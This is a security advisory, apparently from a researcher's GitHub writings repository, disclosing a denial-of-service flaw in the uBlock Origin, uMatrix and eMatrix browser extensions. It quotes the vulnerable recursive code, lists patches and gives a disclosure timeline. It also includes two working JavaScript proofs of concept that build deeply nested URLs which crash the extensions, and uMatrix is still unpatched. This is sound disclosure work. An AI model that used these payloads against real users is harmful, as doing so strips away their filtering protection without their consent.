https://github.com/vtriolet/writings/blob/main/posts/2021/ublock_origin_and_umatrix_denial_of_service.adoc

Skip to content
 
Sign up

  * Why GitHub?
    Features -
      + Mobile -
      + Actions -
      + Codespaces -
      + Packages -
      + Security -
      + Code review -
      + Issues -
      + Integrations -
      + GitHub Sponsors -
      + Customer stories-
  * Team
  * Enterprise
  * Explore
      + Explore GitHub -

    Learn and contribute

      + Topics -
      + Collections -
      + Trending -
      + Learning Lab -
      + Open source guides -

    Connect with others

      + The ReadME Project -
      + Events -
      + Community forum -
      + GitHub Education -
      + GitHub Stars program -
  * Marketplace
  * Pricing
    Plans -
      + Compare plans -
      + Contact Sales -
      + Education -

[                    ] [search-key]

  *  
    #
    In this repository All GitHub |
    Jump to |

  * No suggested jump to results

  *  
    #
    In this repository All GitHub |
    Jump to |
  *  
    #
    In this user All GitHub |
    Jump to |
  *  
    #
    In this repository All GitHub |
    Jump to |

Sign in
Sign up
{{ message }}

vtriolet / writings

  * Notifications
  * Star 4
  * Fork 0

  * Code
  * Issues 0
  * Pull requests 0
  * Security
  * Insights

More

  * Code
  * Issues
  * Pull requests
  * Security
  * Insights

Permalink
main
Switch branches/tags
[                    ]
Branches Tags
Could not load branches
Nothing to show
{{ refName }} default View all branches
Could not load tags
Nothing to show
{{ refName }} default
View all tags

writings/posts/2021/ublock_origin_and_umatrix_denial_of_service.adoc

Go to file

  * Go to file T
  * Go to line L
  * 
  * Copy path
  * Copy permalink

@vtriolet
vtriolet Remove uMatrix mitigations
...
Latest commit fa5a1c7 Jul 16, 2021 History

The previous mitigations were incomplete and potentially misleading.

1 contributor

Users who have contributed to this file

200 lines (139 sloc) 10.8 KB
Raw Blame
   

  * Open with Desktop
  * View raw
  * View blame

 uBlock Origin (and uMatrix) DoS with strict-blocking filter and
crafted URL

 Overview

uBlock Origin (uBO) is a browser extension that blocks ads, security
risks, privacy risks, and other web annoyances. One of its features
is "strict blocking," which prevents all connections-- including
direct navigations-- to resources that match strict filters.

Strict filters are most often used to block sites that perform
affiliate redirects, serve malware, or are otherwise undesirable to
visit. They are typically applied at the domain level (e.g.,
googlesyndication.com) and tend to resemble entries in hosts files,
though they can also target more specific resources.

Strict blocking works by opening a warning page that provides
information about the blocked resource, including its URL and the
filter that prevented the resource from loading. The warning page
also displays query parameters from the blocked URL to help users
bypass redirect tracking.

In earlier versions of uBO, these parameters were parsed recursively
and added to the DOM without any depth checks, which could lead to
extension crashes and memory exhaustion, depending on the browser and
hardware. uMatrix and eMatrix, a fork of uMatrix compatible with Pale
Moon, share similar code for displaying parsed URL parameters.

Users should upgrade to uBO 1.36.2 and eMatrix 4.4.9 to receive fixes
for this security vulnerability, which affects the default
configurations of both extensions. The uBO (Legacy) extension^[1] has
a separate release process and is still vulnerable.

uMatrix remains unpatched and unmaintained.

 Discussion

I discovered this bug while browsing the uBO codebase, which was a
bit surprising given how basic the finding is. Even more surprising
is that this vulnerability seems to have existed in uBO since 2015^[2
] (and in uMatrix since 2017^[3]). Perhaps the extension has not
received as much attention from security researchers as I'd expected,
given its popularity and its security- and privacy-related
functionality?

 Vulnerability

Here is the vulnerable code from uBO 1.36.0:

uBlock/src/js/document-blocked.js

const renderParams = function(parentNode, rawURL) {
    const a = document.createElement('a');
    a.href = rawURL;
    if ( a.search.length === 0 ) { return false; }

    let pos = rawURL.indexOf('?');
    const li = liFromParam(
        vAPI.i18n('docblockedNoParamsPrompt'),
        rawURL.slice(0, pos)
    );
    parentNode.appendChild(li);

    const params = a.search.slice(1).split('&');
    for ( const param of params ) {
        let pos = param.indexOf('=');
        if ( pos === -1 ) {
            pos = param.length;
        }
        const name = safeDecodeURIComponent(param.slice(0, pos));
        const value = safeDecodeURIComponent(param.slice(pos + 1));
        const li = liFromParam(name, value);
        if ( reURL.test(value) ) {
            const ul = document.createElement('ul');
            renderParams(ul, value);                            (1)
            li.appendChild(ul);
        }
        parentNode.appendChild(li);
    }
    return true;
};

 1. renderParams is called recursively without taking into account
    the current nesting level. This allows for repeated allocations
    that can cause resource exhaustion on memory-constrained hardware
    and extension crashes in Chrome.

For reference, here is what the warning page looks like in uBO 1.36.0
with some nested parameters displayed:

uBO's strict-blocking warning page. The page displays a URL that
contains a few levels of nested parameters and the parsed
representations of those parameters.
Figure 1. uBO's strict-blocking warning page

 Impact and scope

The strict-blocking warning page is only displayed when direct
navigations are blocked. This means that malicious hosts would need
to induce users to trigger a navigation somehow, such as by clicking
a link. iframes are classified as sub-documents and do not trigger
the warning page, which should make it harder for malicious hosts to
exploit this vulnerability in the background.

When uBO (or uMatrix) crashes, users are left without filtering
protection until the extension is reloaded. This introduces the
possibility of undesired traffic flowing to and from the user's
browser. I tested three browsers-- Firefox, Chrome, and Pale Moon-- and
only noticed extension crashes in Chrome. Other browsers that uBO
supports, such as Opera and Edge, were not tested and may exhibit
different behavior.

The vulnerability affects standard configurations of uBO, uMatrix,
and eMatrix because each extension enables filter lists that contain
thousands of strict filters by default.

 uBO and eMatrix patches

uBO 1.36.2 restricts parameter-nesting to 2 levels to fix the bug^[4
], and eMatrix 4.4.9 restricts parameter-nesting to 3 levels to fix
the same issue^[5].

 uMatrix mitigations

The uMatrix repository was archived in September 2020^[6], and the
last stable uMatrix release was in September 2019^[7]. Until now,
I've been treating uMatrix similarly to how I treated TrueCrypt after
its development had stopped: unmaintained but still trustworthy in
the absence of known vulnerabilities^[8]. I may have to rethink my
default stance for unmaintained security-related software going
forward.

Edit: This post previously included mitigations that were incomplete
and potentially misleading for users with customized rules. As a
result, I no longer feel comfortable making general recommendations
for securing uMatrix installations, if that is indeed possible. I
apologize for any confusion that I've caused, especially because some
of the flawed mitigations have been quoted elsewhere.

 POCs

 uBO

// bet365.com is used because uBO enables EasyList by default and because
// EasyList contains this entry: ||bet365.com/*?affiliate=$document

let repetitions = 8000;
if (navigator.userAgent.includes('Chrome')) {
    // Lower the number of repetitions in Chrome to prevent
    // a 'Maximum call stack size exceeded' exception
    repetitions = 3000;
}

const url = 'http://bet365.com/?affiliate=' + 'http://a?a='.repeat(repetitions);
window.location = url;

// Notice the browser eating CPU and memory. In Chrome, uBO eventually crashes
// and must be reloaded to work again.

 uMatrix and eMatrix

// googleadservices.com is used because uMatrix and eMatrix enable Peter Lowe's
// tracking list by default and because the list contains this entry:
// 127.0.0.1 googleadservices.com

let repetitions = 8000;
if (navigator.userAgent.includes('Chrome')) {
    // Lower the number of repetitions in Chrome to prevent
    // a 'Maximum call stack size exceeded' exception
    repetitions = 3000;
} else if (navigator.userAgent.includes('PaleMoon')) {
    // Pale Moon can actually handle more repetitions than this,
    // but its memory usage becomes excessive (>10GB)
    repetitions = 18000;
}

const url = 'http://googleadservices.com/?a=' + 'http://a?a='.repeat(repetitions);
window.location = url;

// Notice the browser eating CPU and memory. In Chrome, uMatrix eventually crashes
// and must be reloaded to work again.

 Timeline

  * 2021-07-05 - I emailed gorhill (the author of uBO and uMatrix) my
    findings

  * 2021-07-06 - gorhill pushed a fix for uBO and tagged 1.36.2^[9]

  * 2021-07-06 - I emailed vannilla (the maintainer of eMatrix) my
    findings

  * 2021-07-06 - vannilla pushed a fix for eMatrix and tagged 4.4.9^[
    10]

  * 2021-07-06 - uBO 1.36.2 became available on the Chrome and
    Firefox add-ons sites

  * 2021-07-07 - uBO 1.36.2 became available on the Opera add-ons
    site

  * 2021-07-11 - eMatrix 4.4.9 became available on the Pale Moon
    add-ons site after a beta-testing period

  * 2021-07-14 - I published this post

 Acknowledgments

Thanks to gorhill for fixing the issue in uBO, preparing a release,
and creating software that has improved daily web-browsing for many
users.

Thanks to vannilla for fixing the issue in eMatrix and preparing an
out-of-band release.

Thanks to nikrolls for submitting uBO 1.36.2 to the Edge add-ons
site.

Thanks to JustOff for agreeing to prepare a future uBO (Legacy)
release that addresses the vulnerability.

 References

  * Documentation for uBO's strict-blocking feature

  * Documentation for uMatrix's strict-blocking feature

---------------------------------------------------------------------
1. A release of the uBO (Legacy) extension is forthcoming.
2. Strict-blocking support was added to uBO in commit a4b4bc and was
based on discussion in the issue tracker. Support for displaying
parsed URL parameters was added later in commit 1d5a59 and was based
on a feature request.
3. uBO's support for displaying parsed URL parameters was ported to
uMatrix in commit 3f8168.
4. The uBO vulnerability was fixed in commit 365b20.
5. The eMatrix vulnerability was fixed in commit 42869a.
6. gorhill commented about archiving the uMatrix repository in
September 2020.
7. The last stable release of uMatrix, 1.4.0, was tagged on September
5, 2019.
8. I eventually migrated away from TrueCrypt after an unpatched
vulnerability was discovered.
9. uBO 1.36.2 was tagged shortly after notification of the
vulnerability.
10. eMatrix 4.4.9 was tagged shortly after notification of the
vulnerability.
[                    ] Go
  * (c) 2021 GitHub, Inc.
  * Terms
  * Privacy
  * Security
  * Status
  * Docs

 

  * Contact GitHub
  * Pricing
  * API
  * Training
  * Blog
  * About

You can't perform that action at this time.
You signed in with another tab or window. Reload to refresh your
session. You signed out in another tab or window. Reload to refresh
your session.